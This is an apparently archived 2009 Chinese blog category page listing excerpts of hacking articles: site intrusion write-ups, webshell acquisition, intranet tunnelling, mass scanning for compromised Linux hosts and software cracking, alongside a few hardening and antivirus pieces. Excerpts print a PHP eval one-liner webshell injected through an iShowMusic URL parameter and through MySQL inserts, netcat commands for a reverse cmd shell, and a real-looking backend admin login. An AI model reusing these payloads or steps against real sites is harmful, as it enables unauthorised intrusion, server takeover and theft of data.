丫丫网络_博客_破解工具使用

百度空间 | 百度首页

文章列表

您正在查看 "破解工具使用" 分类下的文章

对纵横时空文学站的一次安全检测(图)

2009年08月02日星期日上午 03:10

纵横时空文学站地址为http://xxx.ouou.com/，是ouou网站下属的一个文学小说的网站。界面做的非常漂亮. 初步看了下为PHP MYSQL的架构PHP版本为PHP/5.1.4-0.1. 。WEBSERVER使用的是Apache/2.0.55 基于以上几点应该大概能判断出服务器应该是使用的UNIX . 这种架构应该为典型的P M U的架构了也就是PHP MYSQL UNIX 。可能有读者会问了？你怎么知道他的Apache跟MYSQL的版本呢？其实这个很简单。在WEB随便输入一个不存在的页面看下暴错信息就OK了。如图1

类别：破解工具使用 | 评论(4) | 浏览()

2009年08月02日星期日上午 03:08

此野猪OllyDBG系在shoooo大侠创作的“野猪力量 -- 注入”文章中原代码修改重新编译后,在cao_cong汉化的
第二版基础上，修正了目前已知BUG，能轻松调试Themida、Winlicense、ExeCryptor、ASProtect等强壳。
野猪力量有如下优点:
1.那些父进程的Anti失效；
2.现有检测OD特征码的Anti失效；
3.直接把OD注入到exepolrer.exe中;
当然，也有如下缺点:
1.不能调试DLL文件；
2.对某些插件不兼容；
3.不能添加到右键菜单中；
4.不能同时打开2个野猪Dbg；
5.

类别：破解工具使用 | 评论(0) | 浏览()

iShowMusic V1.2音乐系统写入Shell漏洞(图)

2009年08月02日星期日上午 03:06

作者：陆羽

前段时间在Sebug看到一个漏洞公告，是iShowMusic音乐系统的漏洞，公告说明是error.php文件在接受程序错误的时候将错误记录到data/error.php里。因此导致提交的时候可以写入一句话参数。具体漏洞公告查看
http://www.sebug.net/vulndb/3604/
漏洞测试方法：
http://www.xxx.com/error.php?errid=1&errtitle=<?eval(_POST[a]);?>
Errtitle参数没有对提交来的内容进行任何过滤就把他写入到data/error.php这个文件里。
因此就产生了可以构造一句话木马获得shell的漏洞。好了废

类别：破解工具使用 | 评论(0) | 浏览()

IIS优化为Web服务器减负(图)

2009年08月02日星期日上午 03:05

打造基于IIS 6.0的站点是很多企业的首选，但是IIS相对于其他Web平台不但对硬件的要求比较高，而且其性能不够尽如人意。如果没有强劲的硬件平台，用IIS搭建的Web站点确实有些老牛破车的味道。另外，IIS保守的默认设置让这一切雪上加霜。如何在现有的硬件平台上打造快捷的Web服务器呢?那就从IIS优化，为Web减负开始。　　1、禁止多余的Web服务扩展

　　IIS6.0支持多种服务扩展，有些管理员偷懒或者不求甚解，担心Web运行中出现解析错误，索性在建站时开启了所有的Web服务扩展。殊不知，这其中的有些扩展比如

类别：破解工具使用 | 评论(0) | 浏览()

内网渗透利器reduh的使用方法(图)

2009年08月02日星期日上午 03:03

国外大牛的作品，偶顺手写了个使用说明。e文好的看原文 http://www.sensepost.com/research/reduh/

这个工具可以把内网服务器的端口通过http/https隧道转发到本机，形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

本机-------客户端---------（http隧道）-----------服务端------------------内网服务器

服务端是个webshell（针对不同服务器有aspx,php,jsp三个版本），客户端是java写的，本机执行最好装上jdk。

把客户端

类别：破解工具使用 | 评论(0) | 浏览()

合理配置服务器防止Webshell是有效方法(图)

2009年08月02日星期日上午 03:01

既然是我们的防范是从入侵者角度来进行考虑，那么我们就首先需要知道入侵者的入侵方式。目前较为流行web入侵方式都是通过寻找程序的漏洞先得到网站的webshell然后再根据服务器的配置来找到相应的可以利用的方法进行提权，进而拿下服务器权限的。所以配合服务器来设置防止webshell是有效的方法。

　　一、防止数据库被非法下载

　　应当说，有一点网络安全的管理员，都会把从网上下载的网站程序的默认数据库路径进行更改。当然也有一部分管理员非常粗心，拿到程序直接在自己的服务器上进行安装

类别：破解工具使用 | 评论(2) | 浏览()

2009年08月02日星期日上午 03:00

虽然是低权限的，能做的事和webshell上的差不多，不过使用起来还是要方便很多。

前提：
1.能用webshell运行cmd命令。
方法有很多，首先是wscript.shell，如果被改名或者被删了，就找可运行目录上传cmd.exe。

2.上传nc。可以跟cmd.exe上传到同一目录。

步骤：
现在本地监听一个端口。

nc -vv -l -p 8080

最好是80或8080这样的端口，被防火墙拦截的几率小很多。我机器80被apache占了，就用8080了。

在webshell运行下面命令连接我们监听的端口得到cmdshell:

nc -vv 222

类别：破解工具使用 | 评论(0) | 浏览()

进后台简单拿Webshell(适合菜鸟)(图)

2009年08月02日星期日上午 02:58

我随便找了个后台,还是以前写帖子找的,这里我给你们用户名和密码吧!
admin appliedtek101.
工具: WSockExpert.exe抓包工具,明小子
打开抓包工具的界面,你会看到什么也没有,然后注意点左上面那小文件夹图标
,然后出现选择那个iexplore.exe,找到企业后台管理,然后点open,设置如图1

点open以后你将什么也开不到,那就对了,因为你还没上传
进去找个文章发表的地方,肯定有大家放心,数据库备分肯定没有,那管

类别：破解工具使用 | 评论(0) | 浏览()

2009年08月02日星期日上午 02:56

来源：零魂’s blog

昨天看一篇文章中说到mysql导出一句话木马拿webshell的方法。
文章中用到的sql语句大体如下(命令行或者其它能执行sql命令的shell都行)：

drop table if exists temp; //如果存在temp就删掉
create table temp(cmd text not null); //建立temp表，里面就一个cmd字段
insert into temp (cmd) values(’<? php eval(_post[cmd]);?>’); //把一句话木马插入到temp表

类别：破解工具使用 | 评论(0) | 浏览()

动网8.1后台获取Webshell的详细方法(图)

2009年08月02日星期日上午 02:55

此文章已发表在《黑客X档案》2008年第2期杂志上后经作者发布在博客上，如转载请务必保留此信息！
文章难易度：★★★
文章阅读点：动网8.1后台获取Webshell的详细方法
话说这期公布了一个动网8.1的最新注入漏洞，利用该漏洞可以轻松得到管理员密码的MD5值，进而查询密码明文进入后台。不过至于进了后台怎么拿 Webshell就没有介绍，本文将详细讲述动网8.1论坛后台获取Webshell的方法。动网虽然一直“洞”不断，不过8.1版本明显在后台安全方面比以前的版本加强了一些，甚至

类别：破解工具使用 | 评论(0) | 浏览()

2009年08月02日星期日上午 02:53

我朋友对http://www.059466.com/里的模拟考试程序非常感兴趣，要源码。
要源码咱就……
整体看

首页应该自己编写的。点连接加’测试注入。发现过滤了，不过过滤了post和get。cookie应该没过滤。。我也没尝试。换种方法再说。

先不管了，找下后台。看这个网站有点像企业站。就随便加了个manage目录。。没想到还真有。界面也非常

类别：破解工具使用 | 评论(0) | 浏览()

Linux之肉鸡扫描篇(图)

2009年08月02日星期日上午 02:51

很多菜鸟都在重复的玩3389肉鸡，时间长了自然就腻味了，非常梦想得到自己的Linux肉鸡。今天我就写一篇关于菜鸟如何获得大量Linux肉鸡的方法。

另外还需要一个VNC的Linux版本，头一次得到自己的Linux肉鸡，当然要看看它的桌面了。工具基本齐全了，下面首先请出Ssport这个强大的、特别适合新手入侵者使用的扫描器。程序界面如图1所示。

图1

软件的中部位置有端口设置

类别：破解工具使用 | 评论(0) | 浏览()

实例破解Tegoweb程序(图)

2009年08月02日星期日上午 02:50

Tegoweb 破解过程。

首先用PEID检测一下有没有壳

结果明显，没有壳，而且是采用VB编写的。

用W32DSM反汇编看一下吧。要静态分析当然要知道软件对错误注册码的一些反应啊，于是打开软件注册页面，郁闷~~！都输入了N长的数字了，旁边的注册按钮怎么还没亮起来？

类别：破解工具使用 | 评论(0) | 浏览()

优秀的安全软件AVG简体中文版教程(图)

2009年08月02日星期日上午 02:48

AVG是一款很优秀的安全软件，自推出以来颇受用户好评！强悍的能力，提供免费版本供用户使用……诸多优点使其获得不少忠实用户，即便有一定的语言障碍，AVG在中国还是赢得了不少拥趸！现如今，AVG发布了简体中文版，语言障碍已不复存在，这对国内用户来说绝对是利好消息。不妨一起来体验一下AVG简体中文免费版吧！
　　AVG简体中文免费版信息

（图：1 AVG简体中文免费版）
　　AVG Anti-Virus Free Edition，Grisoft公司产品。
　　

类别：破解工具使用 | 评论(0) | 浏览()

绿色免费恶意软件查杀工具(图)

2009年08月02日星期日上午 02:46

　　恶意软件查杀助理可以帮助您查杀超过1000多款恶意软件、木马病毒插件，找出隐匿在系统中的毒手！本软件纯绿色，无需安装，完全免费，不捆绑任何插件！特征库支持在线升级，以查杀更多、更新的木马病毒插件。每个月我们都会至少升级两次特征库，请及时升级！

点击此处下载最新版恶意软件查杀助理

一、绿色免费恶意软件查杀助理 资料：

类别：破解工具使用 | 评论(0) | 浏览()

[首页] 1 [2] [3] [4] [5] [6] [7] [8] [9] [10] [下一页] [尾页]

文章分类

默认分类(10047)

腾讯专区(665)

加密解密(806)

成人笑话(2612)

编程技术(2214)

漏洞研究(240)

破解工具使用(1565)

电脑界网络快讯(8440)

笑话大全-夫妻篇(2998)

笑话大全-愚人篇(1996)

笑话大全-爱情篇(2504)

笑话大全-恐怖篇(1397)

笑话大全-家庭篇(1780)

笑话大全-校园篇(2721)

笑话大全-交通篇(1249)

笑话大全-儿童篇(2903)

笑话大全-医疗篇(1217)

笑话大全-军事篇(2591)

笑话大全-司法篇(1438)

笑话大全-古代篇(1977)

笑话大全-经营篇(958)

笑话大全-名人篇(2501)

笑话大全-宗教篇(1557)

笑话大全-电脑篇(1248)

操作系统安全(333)

十万个为什么-动物篇(305)

十万个为什么-植物篇(266)

十万个为什么-天文篇(182)

十万个为什么-生活篇(229)

幽默-绕口令大全(178)

幽默-三句半大全(190)

新闻中心-奥运专栏(471)

linux-系统管理配置(13038)

软件-注册机-注册码(0)

小知识-职业健康(1056)

小知识-健康需知(454)

linux-网络技术(11646)

linux-数据库技术(1267)

Linux Desktop(3871)

文章存档

最新文章评论

哥们，那来的？真是你自己编译完了自己的总结么？

如果哪个说要帮，这人一定会被骂得死无葬身之地

什么是RSS？

©2009 Baidu